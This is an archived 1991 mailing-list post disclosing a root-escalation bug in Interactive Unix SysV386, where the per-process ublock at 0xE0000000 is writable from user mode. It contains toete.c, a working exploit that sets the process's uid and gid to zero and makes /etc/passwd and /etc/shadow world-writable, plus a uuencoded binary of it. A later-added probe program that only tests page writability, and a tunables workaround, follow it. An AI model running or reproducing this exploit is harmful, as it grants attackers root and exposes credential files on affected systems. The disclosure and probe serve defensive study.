SECURITY BUG IN INTERACTIVE UNIX SYSV386 (REPOST)

Joern Lubkoll lumpi@dobag.in-berlin.de
Thu Feb 14 20:20:39 AEST 1991


Because I have been getting lots of mail about my posting not coming
through to some sites, here is another repost. Whoever eats this posting
should be aware that they are a news censor!

--------- ORIGINAL POSTING FOLLOWS -----------

It was a long process of thought about this, but now, after half
a year of dispute with Interactive, here it finally is:

--- jl

Hello, you at Interactive Systems Corporation!

It seems that your very cute Interactive Unix system has a nice bug!

EVERYONE who has access to a shell and a compiler, or who has an Interactive
system at home (to upload binaries), CAN BECOME ROOT.

It seems that your programmers aren't able to program the 386 protected
mode correctly. There exists the possibility to write-protect segments and
pages... It would be very useful to write-protect the internal data
structures which the system uses to store information about the user.

Offering the ability to write to these segments is just like offering
CIA identity cards by mail order to everyone (SALE $5).

If you don't believe it... try the little program below and you'll see!

I didn't believe it either, but... see for yourself!

I expect bug fixes immediately, or my money back for the Interactive
system... VERY soon please!

I have had a lot of conversation with 'Intra Unix' in Germany and a
lot of people at 'ico.isc.com' about the problem. They just told
me that this is only a 'feature', not a bug!

Simply put, it is a bug in the coprocessor emulation code, which
will allow systems without a co-CPU to be broken, just because some
programmers aren't able to allocate their own buffers :-)

If you have a co-CPU and Release >= 2.2, you may set the kernel tunable
parameters UAREAUS and UAREARW to 0 to protect yourself.

Dobag does not have this problem, due to it being a 486 system, but
there will be a lot of systems without a co-CPU!

There is only one way to fix this problem: phone Interactive or your
distributor and get very angry!

Next follows toete.c, the program to kill any ISC system not
equipped with a co-CPU.

--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE

/* If you use Interactive Unix 2.2, uncomment the following line */
/* #define ISC22 */

#include <stdio.h>
#ifdef ISC22
#include <sys/limits.h>
#include <sys/unistd.h>
#else
#include <limits.h>
#include <unistd.h>
#endif
#include <sys/stat.h>        /* chmod() */
#include <sys/sysi86.h>
#include <sys/signal.h>
#include <sys/types.h>
#define ushort	unsigned short
#define ulong	unsigned long
#include <sys/fs/s5dir.h>
#include <sys/user.h>        /* struct user: the per-process u-area (ublock) */

int main(void)
{
  struct user *dumm;

  /*  0xE0000000 is the virtual address of the ublock for the currently
      running program. On an affected ISC kernel (no co-CPU) this page
      is mapped writable from user mode. */

  dumm = (struct user *) 0xE0000000;

  /*  Here we are so kind as to change our effective and real user id
      to zero, which means that we can do whatever we want... */

  dumm->u_uid = 0;    /* A well-programmed system has to give a
                         segmentation or protection violation
                         error at this line. But don't expect
                         Interactive Unix to do so... */
  dumm->u_gid = 0;

  dumm->u_ruid = 0;
  dumm->u_rgid = 0;

  /*  What would be the first thing you want to do if you became root
      on another system? */

  chmod("/etc/passwd", 0666);
  chmod("/etc/shadow", 0666);

  /*  If you don't believe what I say, uncomment the following line: */

/*  execl("/bin/sh", "sh", "-c", "/bin/ls -l /etc/passwd", (char *) 0); */

  return 0;
}

--- END OF toete.c ---

For those who won't believe it, here is a uuencoded version of the
binary 'toete'.

table
 !"#$%&'()*+,-./0123456789:;<=>?
@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_
begin 644 toete
M3 $$ *+Q%"<          !P #P$+ 0  S (  #P"        U    -    "<z
M T  +G1E>'0   #0    T    ,P"  #0                    (    "YDy
M871A    G -  )P#0  \ @  G ,                  $     N8G-S    x
M -@%0 #8!4                            "     +F-O;6UE;G0     w
M          #8!0                    (  ,.0D)"#[ B+[(M%"(U4A1")v
M%9P#0 !2C54,4E#HW____VH Z)    "#Q 3H'    (/$#%#H<P(  &H N $ u
M  ":      < ],.0D)#K2\=%_    ."+1?QFQX#J$     "+1?QFQX#L$   t
M  "+1?QFQX#N$     "+1?QFQX#P$     !HM@$  &B@ T  Z P   "#Q C)s
MPU6+[%#KKY"X#P   )H     !P /@NX!   SP,.0D)!5B^R![(0"  !75K[_r
M____@WT( '4Q:+0%0 #HP    %F%P(E%"'0)BT4(B@"$P'46@#VP!4   '0&q
M,\!>7\G#QT4(O05  ,8%L 5   !HPP5  (U%@%#H6 $  (/$"/]U"(U%CE#Hp
M20$  (/$"&H C46 4.@3 0  @\0(A<"+^'P^: ("  "-A7[]__]05^@, 0  o
M@\0,/0("  !U&V@" @  C85^_?__4&BL T  Z+0   "#Q PS]E?H"0   %F+n
MQEY?R<.0D+@&    F@     '  ^"#@$  #/ PY"0D%6+[%=64XM]"(L=G - m
M (7;=24SP%M>7\G#D)#_,X/#!%?H&0   (/$"(7 B_!T"(O&6UY?R<.0@SL l
M==_KU)!5B^Q75HM]"(MU#.L.D)"0#[X'1ST]    =!P/O@</OA9&.\)TZHH'k
MA,!U% ^^1O\]/0   '4)B\9>7\G#D)"0,\!>7\G#D)!75HM\) R+="00BTPDj
M%(O'B]'!Z0+SI8O*@>$#    \Z1>7\.X!0   )H     !P /@DH   ##D+@#i
M    F@     '  ^"-@   ,.05XO6BWPD##/ N?_____RKO?1BW0D#(M\) B+h
MP<'I O.EB\B!X0,   #SI(M$) B+\E_#D*/4!4  N/_____#D. at 7    BU0Dg
M!+@!    F@     '  ^"V?___\/#D)"0     "]E=&,O<&%S<W=D   @(" @f
M(" @(" H*"@H*" @(" @(" @(" @(" @(" @($@0$! 0$! 0$! 0$! 0$!"$e
MA(2$A(2$A(2$$! 0$! 0$(&!@8&!@0$! 0$! 0$! 0$! 0$! 0$! 0$!$! 0d
M$! 0@H*"@H*" @(" @(" @(" @(" @(" @(" @(" @(" @(0$! 0(               c
M                                                            b
M                                                            a
M                                       ! @,$!08'" D*"PP-#@\0z
M$1(3%!46%Q@9&AL<'1X?("$B(R0E)B<H*2HK+"TN+S Q,C,T-38W.#DZ.SP]y
M/C] 86)C9&5F9VAI:FML;6YO<'%R<W1U=G=X>7I;7%U>7V!!0D-$149'2$E*x
M2TQ-3D]045)35%565UA96GM\?7Y_                                w
M                                                            v
M                                                            u
M                      $   !#2%)#3$%34P!A<V-I:0 O;&EB+V-H<F-Lt
+87-S+P          s
 r
end


--- END ---

JUST HAVE FUN!

Regards, JL

-- 
lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."
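
The test the posting actually performs (does a user-mode write to the ublock fault, or does it go through?) can be made without touching anybody's uid. The program below is an added example, not part of the original posting and not ISC code: it probes whether a page is writable from user mode by attempting a write under a SIGSEGV/SIGBUS handler and reporting the outcome instead of dying. So that it runs on any current POSIX system, the pages it probes are created with mmap()/mprotect(); on an affected Interactive Unix box one would pass the ublock address 0xE0000000 from the posting instead. The function names probe_writable and map_test_page are my own.

```c
/*
 * Added example: does a user-mode write to a page fault, or succeed?
 * A correctly protected kernel page raises SIGSEGV (SIGBUS on some
 * systems) on the write; the handler longjmps back and we report 0.
 * If the write goes through, the page is exposed and we report 1.
 */
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf probe_env;
static volatile sig_atomic_t probe_faulted;

static void probe_handler(int sig)
{
    (void)sig;
    probe_faulted = 1;
    siglongjmp(probe_env, 1);
}

/* Returns 1 if a byte could be written at addr, 0 if the access faulted.
 * The byte just read is written back, so a successful probe leaves the
 * page contents unchanged (the ublock is NOT modified, unlike toete.c). */
int probe_writable(void *addr)
{
    volatile unsigned char *p = addr;
    struct sigaction sa, old_segv, old_bus;

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = probe_handler;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_NODEFER;            /* allow the handler to fire again */
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    probe_faulted = 0;
    if (sigsetjmp(probe_env, 1) == 0) {
        unsigned char saved = *p;        /* faults if the page is unmapped */
        *p = saved;                      /* the actual write probe */
    }

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return probe_faulted ? 0 : 1;
}

/* Hypothetical helper: map one anonymous page with the given protection,
 * standing in for kernel pages we cannot create here. NULL on failure. */
void *map_test_page(int prot)
{
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
    void *p = mmap(NULL, page, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED)
        return NULL;
    if (mprotect(p, page, prot) != 0) {
        munmap(p, page);
        return NULL;
    }
    return p;
}

int main(void)
{
    void *rw = map_test_page(PROT_READ | PROT_WRITE);
    void *ro = map_test_page(PROT_READ);

    printf("read-write page: %s\n", probe_writable(rw) ? "WRITABLE" : "protected");
    printf("read-only page:  %s\n", probe_writable(ro) ? "WRITABLE" : "protected");

    /* On an ISC 386 box without a co-CPU, probe the ublock from the posting
     * instead (an address that only exists on that kernel):
     *   probe_writable((void *) 0xE0000000);
     * "WRITABLE" there means the u-area is exposed as the posting describes. */
    return 0;
}
```

On a kernel that maps the u-area read-only to user mode, the probe of 0xE0000000 reports "protected"; on an affected system it reports "WRITABLE", and the UAREAUS/UAREARW tunables mentioned in the posting are the workaround to try. Because the probe only rewrites the byte it has just read, it can be run on a production machine without changing the process's credentials.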



More information about the Comp.unix.sysv386 mailing list